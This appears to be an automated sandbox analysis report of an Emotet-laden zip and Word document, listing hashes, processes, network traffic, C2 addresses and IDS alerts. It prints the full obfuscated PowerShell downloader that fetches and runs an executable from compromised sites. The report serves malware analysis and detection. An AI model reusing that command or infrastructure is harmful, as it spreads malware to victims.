File name: | c6b46b1c5f5ddc566e00.zip |
Full analysis: | https://app.any.run/tasks/87a2500a-6aae-4cd7-88d4-97c8fdfd3269 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 15:43:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 51187EBD59A19171C45E45566E38E34D |
SHA1: | 3A0CE24D0CC220836B0E99097146D39652E81DE9 |
SHA256: | 20E3FF86F8D4187F7C24A65971BDF430209DCF5A5C688233C996197AFC60EB6D |
SSDEEP: | 3072:9S5g1QXfF9LBxIeD5OhAnr/CrNnEW7lXxo4pxeutsgyY:ggKvHdxIeshAerNEenfsgyY |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 15:42:24 |
ZipCRC: | 0x8d5f9731 |
ZipCompressedSize: | 148617 |
ZipUncompressedSize: | 269056 |
ZipFileName: | c6b46b1c5f5ddc566e00cd3103aeecaf438d353f2e9b7980a2aa43c5ea8d4a3c.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3512 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\c6b46b1c5f5ddc566e00.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3616 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\c6b46b1c5f5ddc566e00cd3103aeecaf438d353f2e9b7980a2aa43c5ea8d4a3c.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3636 | powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2268 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3560 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3720 | --d05e77b4 | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2496 | --d05e77b4 | C:\Users\admin\523.exe | 523.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4060 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3020 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3136 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3512 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3512.43631\c6b46b1c5f5ddc566e00cd3103aeecaf438d353f2e9b7980a2aa43c5ea8d4a3c.bin | — | |
MD5:— | SHA256:— | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1D5B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:AFCEA3D7CD6B05165D61AECE40F9651C | SHA256:9695AC730B408B81A24A1820F53C5F50EFDCD8F374BFC6E543249CA9DE7D6991 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FE5518FB557C82325D55D619EA9E645E | SHA256:0693EC0166205AE8069F572B9EF3252CB7B29E24B6204F1E25A5D3BA45989749 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BA2B4C2.wmf | wmf | |
MD5:CC2907FE1152A9354A547AC053E2E199 | SHA256:C2760A3B7625A5576EB2D76DE5CB9637708ACB71006FB7C67CA2AC97A4DEFEF5 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A677116.wmf | wmf | |
MD5:6FE7059EDC88FF655F29FC505F6F5DFE | SHA256:B15228B5F7A4E21EBBCE94E37C68B1CEDB2D2A1B7579670D0792AECFF0619BA7 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51D6F594.wmf | wmf | |
MD5:179BADCCE447F914B1C557FED0A000BE | SHA256:E9C54F78BF160734F9880F6E1A10AC5B1D4C71648587321D5A3435B269A33D22 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:2787C8306C566A87723067EB9C002001 | SHA256:A1382DBA6B59BECBBE7486ADD33A07D8EAAEF6EF78041700D43E4F301FA96DFC | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E95E516C.wmf | wmf | |
MD5:B29CE4681E8A06CC469A2C0886C8BAD5 | SHA256:C9DD6935018D0EA9F61B7EB27ECD39598AF74C384DBA82DD66059AD8B6D30EC7 | |||
3616 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9377085.wmf | wmf | |
MD5:471CAE0A8DBA69FE95345531EF1B0ECA | SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3936 | easywindow.exe | POST | — | 59.152.93.46:443 | http://59.152.93.46:443/vermont/ | BD | — | — | malicious |
3936 | easywindow.exe | POST | — | 91.92.191.134:8080 | http://91.92.191.134:8080/enable/mult/ | IR | — | — | malicious |
3636 | powershell.exe | GET | 200 | 89.46.105.48:80 | http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/ | IT | executable | 404 Kb | suspicious |
3636 | powershell.exe | GET | 200 | 156.67.209.58:80 | http://shael.org/cgi-sys/suspendedpage.cgi | SG | html | 7.40 Kb | malicious |
3636 | powershell.exe | GET | 302 | 156.67.209.58:80 | http://shael.org/hosting/TYXchcKkHz/ | SG | html | 681 b | malicious |
3936 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/cookies/forced/ | DE | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3936 | easywindow.exe | 185.129.92.210:7080 | — | Bravo Online Systems LLC | AZ | malicious |
3936 | easywindow.exe | 59.152.93.46:443 | — | Zipnet Limited DKB AS number | BD | malicious |
3936 | easywindow.exe | 91.92.191.134:8080 | — | Information Technology Company (ITC) | IR | malicious |
3936 | easywindow.exe | 178.254.6.27:7080 | — | EVANZO e-commerce GmbH | DE | malicious |
3636 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown |
3636 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious |
Domain | IP | Reputation |
---|---|---|
shael.org |
| malicious |
www.lottizzazionesavarra.it |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3636 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3636 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3636 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3636 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3936 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3936 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3936 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3936 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3936 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |